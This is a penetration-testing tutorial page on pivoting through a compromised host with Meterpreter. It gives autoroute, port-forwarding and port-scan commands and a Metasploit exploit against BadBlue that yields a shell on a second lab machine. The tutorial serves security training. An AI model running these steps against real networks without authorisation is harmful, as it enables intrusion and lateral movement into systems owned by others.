Pivoting Overview

Pivoting

  • Pivoting is a post exploitation technique that involves utilizing a compromised host that is connected to multiple networks to gain access to systems within other networks.

  • After gaining access to one host, we can use the compromised host to exploit other hosts on a private internal network to which we could not access previously.

  • Meterpreter provides us with the ability to add a network route to the internal network’s subnet, perform port forwarding and consequently scan and exploit other systems on the network.

Port Forwarding

  • Port forwarding is the process of redirecting traffic from a specific port on a target system to a specific port on our system.

  • In the context of pivoting, we can forward a remote port on a previously inaccessible host to a local port on our Kali Linux system so that we can remotely interact/exploit the service running on the port.

To understand pivoting, let's consider a scenario where there are two target systems: Victim 1 (10.0.29.148) and Victim 2 (10.0.29.96). From our attacking machine, we can only communicate with Victim 1, and Victim 1 can communicate with Victim 2. In this case, we need to compromise Victim 1 and then use port forwarding to attack Victim 2.

Pivoting from Victim 1 to Victim 2 Using Meterpreter

  1. Set Up Communication Channel:

    On the meterpreter shell obtained on Victim 1 (10.0.29.148), set up a communication channel to the subnet that includes Victim 2 (10.0.29.96):

    run autoroute -s 10.0.29.0/20

    View the latest routing table to confirm:

    run autoroute -p

  2. Use Metasploit's Port Scanner:

    Since Nmap cannot directly reach Victim 2, use Metasploit's port scanner. Load the TCP port scanner module and set the RHOST to Victim 2:

    use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.29.96
run

  3. Port Forwarding for Nmap Scan:

    To scan services on Victim 2 using Nmap, set up port forwarding. Forward the service running on Victim 2's port 80 to your attacking machine's port 1234:

    portfwd add -l 1234 -p 80 -r 10.0.29.96

    Now, run an Nmap scan on your local machine:

    nmap -sV -p 1234 localhost

    This will show the services running on Victim 2 (10.0.29.96) on port 80.

  4. Exploit the Vulnerability:

    Having detected a vulnerability in BadBlue on Victim 2 (10.0.29.96) on port 80, use the appropriate Metasploit module to exploit it:

    use exploit/windows/http/badblue_passthru
set payload windows/meterpreter/bind_tcp
set RHOSTS 10.0.29.96
run

This will grant you access to Victim 2 (10.0.29.96) through a meterpreter shell.

Meterpreter Commands:

  • run autoroute -s 10.0.29.0/20 – Add a route for the subnet 10.0.29.0/20.

  • run autoroute -p – Show the current routing table.

  • portfwd add -l 1234 -p 80 -r 10.0.29.96 – Forward traffic from local port 1234 to remote IP 10.0.29.96 on port 80.

Metasploit Modules:

  • /auxiliary/scanner/portscan/tcp – A Metasploit auxiliary module for performing TCP port scans.

  • /exploit/windows/http/badblue_passthru – A Metasploit module for exploiting vulnerabilities in the BadBlue web server to achieve remote code execution.

Hacker's Mantra:In a world of zeros and ones, hackers are the ones who give it meaning.

PreviousDumping & Cracking Linux Password HashesNextClearing Your Tracks On Windows & Linux

Last updated